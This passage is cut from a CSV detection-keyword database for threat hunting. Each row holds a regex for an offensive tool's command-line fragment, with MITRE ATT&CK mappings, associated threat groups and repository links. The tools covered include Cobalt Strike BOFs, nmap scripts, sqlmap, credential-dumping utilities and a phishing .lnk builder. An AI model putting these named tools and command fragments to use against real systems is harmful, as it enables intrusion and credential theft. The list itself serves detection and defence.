which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","3522" "* tls-alpn.nse*",".{0,1000}\stls\-alpn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3524" "* tls-nextprotoneg.nse*",".{0,1000}\stls\-nextprotoneg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3525" "* tls-ticketbleed.nse*",".{0,1000}\stls\-ticketbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3526" "* tmp_payload.txt*",".{0,1000}\stmp_payload\.txt.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","3527" "* tn3270-screen.nse*",".{0,1000}\stn3270\-screen\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3528" "* to dump the masterkeys on the current machine from lsass.exe*",".{0,1000}\sto\sdump\sthe\smasterkeys\son\sthe\scurrent\smachine\sfrom\slsass\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","3530" "* to retrieve secrets from machines that were previously SCCM clients*",".{0,1000}\sto\sretrieve\ssecrets\sfrom\smachines\sthat\swere\spreviously\sSCCM\sclients.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","3531" "* to retrieve secrets from machines that were previously SCCM clients*",".{0,1000}\sto\sretrieve\ssecrets\sfrom\smachines\sthat\swere\spreviously\sSCCM\sclients.{0,1000}","offensive_tool_keyword","SharpSCCM","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","3532" "* TokenFinder.py*",".{0,1000}\sTokenFinder\.py.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential 
Access","https://github.com/doredry/TokenFinder","1","0","N/A","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","3533" "* Token-Impersonation.ps1*",".{0,1000}\sToken\-Impersonation\.ps1.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","3534" "* TokenStrip.c *",".{0,1000}\sTokenStrip\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 
RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","N/A","10","10","44","7","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z","3535" "* TokenStripBOF.o *",".{0,1000}\sTokenStripBOF\.o\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","N/A","10","10","44","7","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z","3536" "* TokenUniverse.zip*",".{0,1000}\sTokenUniverse\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","0","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","3537" "* tokenvator *",".{0,1000}\stokenvator\s.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","3538" "* -Tokenvator -Command *",".{0,1000}\s\-Tokenvator\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3539" "* --top-ports 200 -sV -n -Pn --open --max-retries 2 --script vulners*",".{0,1000}\s\-\-top\-ports\s200\s\-sV\s\-n\s\-Pn\s\-\-open\s\-\-max\-retries\s2\s\-\-script\svulners.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability 
Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","3540" "* --tor *",".{0,1000}\s\-\-tor\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3541" "* tor deb.torproject.org-keyring*",".{0,1000}\stor\sdeb\.torproject\.org\-keyring.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","3542" "* --tor_password *",".{0,1000}\s\-\-tor_password\s.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","0","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","3543" "* tor-consensus-checker.nse*",".{0,1000}\stor\-consensus\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3544" "* --tor-port*",".{0,1000}\s\-\-tor\-port.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3545" "* --tor-type*",".{0,1000}\s\-\-tor\-type.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3546" "* totalrecall.py*",".{0,1000}\stotalrecall\.py.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","3547" "* toteslegit.ps1*",".{0,1000}\stoteslegit\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 
- TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","3548" "* traceroute-geolocation.nse*",".{0,1000}\straceroute\-geolocation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3549" "* -tran *",".{0,1000}\s\-tran\s\\s\\s\.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","3550" "* --transformer donut*",".{0,1000}\s\-\-transformer\sdonut.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3551" "* --transformer Loader*",".{0,1000}\s\-\-transformer\sLoader.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3552" "* --transformer pe2sh*",".{0,1000}\s\-\-transformer\spe2sh.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3553" "* --transformer sRDI*",".{0,1000}\s\-\-transformer\ssRDI.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3554" "* tricky.ps1*",".{0,1000}\stricky\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","3555" "* tricky.vbs*",".{0,1000}\stricky\.vbs.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","3556" "* tricky2.ps1*",".{0,1000}\stricky2\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","3557" "* --trusted-for-delegation *",".{0,1000}\s\-\-trusted\-for\-delegation\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","3558" "* TSCHRPCAttack*",".{0,1000}\sTSCHRPCAttack.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 
- T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","3559" "* tso-brute.nse*",".{0,1000}\stso\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3560" "* tso-enum.nse*",".{0,1000}\stso\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3561" "* tsunami.py*",".{0,1000}\stsunami\.py.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3562" "* tsunami_warning.py*",".{0,1000}\stsunami_warning\.py.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3563" "* tun2socks-darwin*",".{0,1000}\stun2socks\-darwin.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#linux","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","3564" "* tun2socks-freebsd*",".{0,1000}\stun2socks\-freebsd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","3565" "* tun2socks-linux*",".{0,1000}\stun2socks\-linux.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - 
TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#linux","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","3566" "* tun2socks-openbsd*",".{0,1000}\stun2socks\-openbsd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","3567" "* tun2socks-windows*",".{0,1000}\stun2socks\-windows.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","3568" "* --tunnel-address 127.0.0.1:7171*",".{0,1000}\s\-\-tunnel\-address\s127\.0\.0\.1\:7171.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","3569" "* tunnel-socks5.py*",".{0,1000}\stunnel\-socks5\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","3572" "* TunnelVisionVM.ova*",".{0,1000}\sTunnelVisionVM\.ova.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & 
